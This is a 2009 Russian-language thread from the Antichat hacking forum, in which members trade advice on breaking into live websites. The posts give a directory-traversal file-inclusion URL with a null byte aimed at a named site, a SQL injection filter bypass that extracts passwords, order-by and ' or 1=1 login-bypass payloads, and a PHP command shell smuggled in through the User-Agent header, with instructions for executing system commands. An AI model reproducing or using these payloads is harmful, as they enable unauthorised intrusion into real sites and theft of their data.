25.05.2009, 14:44
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Доступны логи, в чём проблема?
http://samovar.teaspoon.ru/?what=../../../../../../../../../../../../proc/self/fd/2%00
|
|
|
25.05.2009, 15:15
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
С нами:
9296966
Репутация:
585
|
|
PaCo
Ну, можно попробовать придумать сценарий успешного обхода такой проверки. У меня есть некоторые мысли, но чтоб на практике реализовать это, нужно чтоб совпало слишком много всего. Например, в MySQL 4.0.x можно использовать не-ascii-символы в качестве альтернативы пробельным символам в SQL-запросе. PHP же успешно пропустит некоторые такие символы через эту регулярку (не уверен, что всегда, но у меня получалось такое). Т.е. если SQL-инъекция, например, в параметре WHERE опреатора SELECT, и в этом запросе выбирается одна колонка, то запрос:
id=-1ђunionђselectђpasswordђfromђusers
скорее всего обойдет эту регулярку и успешно выполнится. Теоретически (я не пробовал)... (:
Последний раз редактировалось cr0w; 25.05.2009 в 15:23..
|
|
|
|
25.05.2009, 15:53
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
Сообщение от cr0w
PaCo
Ну, можно попробовать придумать сценарий успешного обхода такой проверки. У меня есть некоторые мысли, но чтоб на практике реализовать это, нужно чтоб совпало слишком много всего. Например, в MySQL 4.0.x можно использовать не-ascii-символы в качестве альтернативы пробельным символам в SQL-запросе. PHP же успешно пропустит некоторые такие символы через эту регулярку (не уверен, что всегда, но у меня получалось такое). Т.е. если SQL-инъекция, например, в параметре WHERE опреатора SELECT, и в этом запросе выбирается одна колонка, то запрос:
id=-1ђunionђselectђpasswordђfromђusers
скорее всего обойдет эту регулярку и успешно выполнится. Теоретически (я не пробовал)... (:
в том то и вся лажа(я забыл упомянуть) что в запрос идет $_POST['id'] в двойных кавычках, фактически мне достаточно и того что бы просто нарушить как то запрос,вызвать ошибку(есть другая скуля но для ее экплотации необходим префикс и в ней еррор не выводится вообше) а в этой скули в случаи неудачи выводится весь запрос с префиксом,а про то что \w может пропустить не совсем печатные символы которые некоторые версии мускуля могут воспринять как пробел( в зависимости от того как был собран PCRE) я в курсе, но двойную ковычку там ничего не заменит, в попытках вызвать Illegal mix of collations я уже испробывал все возможные кодировки, вот запрос которые идет в базу:
PHP код:
SELECT content_name FROM $base.".$prefix_."content_item WHERE $base.".$prefix_."content_item.content_name = \"" . $_POST['id'] . "\" LIMIT 1";
content_name:
varchar(100) ,utf8_unicode_ci, по умолчанию null
Последний раз редактировалось PaCo; 25.05.2009 в 15:57..
|
|
|
|
25.05.2009, 17:03
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами:
9505375
Репутация:
19
|
|
странная SQL inj
При запросе www.host.ru/new/?' вылазит ошибка
Код:
insert into statistic(resource,charset,user_agent,remote_addr,method,URI,DC) values (' - equipment','windows-1251','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)','IP','GET','/new/?'',NOW())<br>: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/new/?'',NOW())' at line 1
В дальнейшем на
+order+by+10000--
+order+by+10000/*
'+order+by+10000--
?-1+order+by+10000--
просто выводит страницу...+ на /**/ заменял....как обойти такую фильтрацию, или может нужно по другому запрос сделать?
ПС. Все хедеры отправляю HttpREQ, т. к. браузер даже на /new/?' не реагирует. |
|
|
|
25.05.2009, 17:10
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
Ты на запрос посмотри - там тока блаинд.
|
|
|
|
25.05.2009, 17:18
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами:
9505375
Репутация:
19
|
|
Я понимаю что блинд. но запросы то +order+by+1000000-- и +order+by+1-- должны возвращать разные результаты...или нужно использовать подзапросы?
|
|
|
|
25.05.2009, 17:22
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами:
9610769
Репутация:
380
|
|
для начало почитай здесь - http://www.phpclub.ru/mysql/doc/insert.html
потом неспеша сюда переходи- http://forum.antichat.ru/thread119047.html
вопросы должны отпасть.
|
|
|
|
25.05.2009, 18:07
|
|
Banned
Регистрация: 20.05.2009
Сообщений: 1
С нами:
8935459
Репутация:
0
|
|
Помогите разобратся вот с этим.
http://forum.antichat.ru/threadnav49775-2-10.html
как понять эту строчьку ?
User-Agent: <?php passthru($_GET['cmd']) ?>
C помощью чего её передать?
Ясно что post запросом но при помощи чего ??
Последний раз редактировалось [ReV]OLVeR; 25.05.2009 в 18:15..
|
|
|
|
25.05.2009, 18:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Этой коммандой ты можешь исполнять системные комманды, используя параметр $_GET['cmd'], т.е. http://site.com/script.php?cmd=help. Передать с помощью программы, отсылающей сокеты, н.п. InetCrack.
|
|
|
|
25.05.2009, 19:46
|
|
Новичок
Регистрация: 21.05.2009
Сообщений: 11
С нами:
8933849
Репутация:
65
|
|
При входе в панэль администратирования задаю зачение:
login:'
Pass:'
в ответ:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
' or 1=1/*
возврощает ответ:
Неверный пароль!
В принципе подобра что есть 4 колонки но скуля блайнд.
Что можно придумать с авторизацией?
PS :jokester c заливкой через ../../proc/self/fd/2%00 почемуто не канает(.
Последний раз редактировалось _Quest_; 25.05.2009 в 19:51..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [ReV]OLVeR](/avatars/avatar85898.jpg?1294776){kind=avatar}
Похожие темы
Комбинированный вид
